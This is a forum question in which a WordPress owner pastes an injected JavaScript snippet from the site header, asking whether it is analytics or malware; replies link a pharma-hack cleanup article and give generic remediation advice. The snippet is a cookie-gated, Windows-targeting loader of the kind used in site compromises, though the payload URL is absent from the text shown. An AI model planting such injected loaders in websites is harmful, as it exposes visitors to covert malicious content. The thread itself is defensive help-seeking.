# What is this? Google analytics cookie or malware?

Tags: wordpress, google-analytics, malware

I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:

`var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};`

That URL at the the end is super suspicious. I googled but found no leads :-(

I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.

Does anyone have any knowledge of this?

Comment: Well if the site is infected it is not a good idea to browse it

Comment: Oops. Yes, sorry.... :-(

Answer found: http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html

Ouch!

Answer (score 0, accepted):

That looks strange to me.  Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site.  You might want to remove the google analytics code from the page and see if that makes a difference.  Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of.  Make sure it is longer then 8 letters.  If your site is infected, take it down from the web NOW until your sure it's not.

Comment: All the passwords have been changed to 20 character strings. Said javascript was disabled and site has been deactivated but had trouble finding the root of the problem.